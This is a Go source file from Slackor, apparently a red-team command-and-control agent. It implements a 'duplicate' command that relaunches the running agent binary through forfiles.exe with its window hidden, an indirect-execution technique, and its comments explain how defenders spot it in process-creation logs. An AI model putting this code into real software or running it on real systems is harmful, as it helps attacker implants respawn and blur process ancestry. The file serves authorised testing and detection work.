github.com/Coalfire-Research/Slackor@v0.0.0-20191010164036-aa32a7f9250b/pkg/windows/duplicate.go (about)

     1  // +build windows
     2  
     3  package windows
     4  
     5  import (
     6  	"bytes"
     7  	"fmt"
     8  	"os"
     9  	"os/exec"
    10  	"syscall"
    11  
    12  	"github.com/Coalfire-Research/Slackor/pkg/command"
    13  )
    14  
// Duplicate is the agent command that relaunches the running agent binary
// through forfiles.exe (see Run). The type carries no state.
//
// Defender note: proxying execution through a built-in Windows utility such
// as forfiles.exe is catalogued as MITRE ATT&CK T1202 (Indirect Command
// Execution). The observable artefact is forfiles.exe appearing as the parent
// of an unrelated executable in process-creation telemetry.
type Duplicate struct{}
    17  
// Name returns the identifier of this command, "duplicate".
func (d Duplicate) Name() string {
	const commandName = "duplicate"
	return commandName
}
    22  
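// Run relaunches the current agent binary (os.Args[0]) as a child of
// forfiles.exe and returns a one-line status string on success.
//
// clientID, jobID and args are not read here; the signature is presumably
// fixed by the interface that command.RegisterCommand expects.
//
// forfiles.exe is invoked with /p (search directory), /m (file mask) and /c
// (command to run per match). With the mask svchost.exe in
// c:\windows\system32 the /c command is expected to run once, so the new
// process is created by forfiles.exe rather than by the calling agent.
//
// Defender note: process-creation logging with command lines (for example
// Sysmon Event ID 1 or Security event 4688) records this as forfiles.exe
// started with "/m svchost.exe /c <binary path>", followed by forfiles.exe
// spawning that binary. HideWindow only suppresses the console window; it
// does not hide the process or its command line from such telemetry.
//
// If forfiles.exe fails, the returned error wraps the original error and
// appends whatever forfiles.exe wrote to stderr.
func (d Duplicate) Run(clientID string, jobID string, args []string) (string, error) {
	self := os.Args[0]

	// Build the command once; the original constructed a throwaway
	// exec.Command(cmdName) first and immediately overwrote it.
	cmd := exec.Command("forfiles.exe", "/p", `c:\windows\system32`, "/m", "svchost.exe", "/c", self)

	// stdout is captured and discarded; stderr is kept for the error path.
	var out, stderr bytes.Buffer
	cmd.Stdout = &out
	cmd.Stderr = &stderr
	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}

	if err := cmd.Run(); err != nil {
		// Previously stderr was collected but never surfaced, so the caller
		// only saw a bare exit status. %w keeps errors.Is/As working.
		if msg := bytes.TrimSpace(stderr.Bytes()); len(msg) > 0 {
			return "", fmt.Errorf("%w: %s", err, msg)
		}
		return "", err
	}
	return fmt.Sprintf("Duplicated %s.", self), nil
}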
    40  
// init registers the Duplicate command with the command package when this
// package is loaded, so merely importing the package makes it available.
func init() {
	var dup Duplicate
	command.RegisterCommand(dup)
}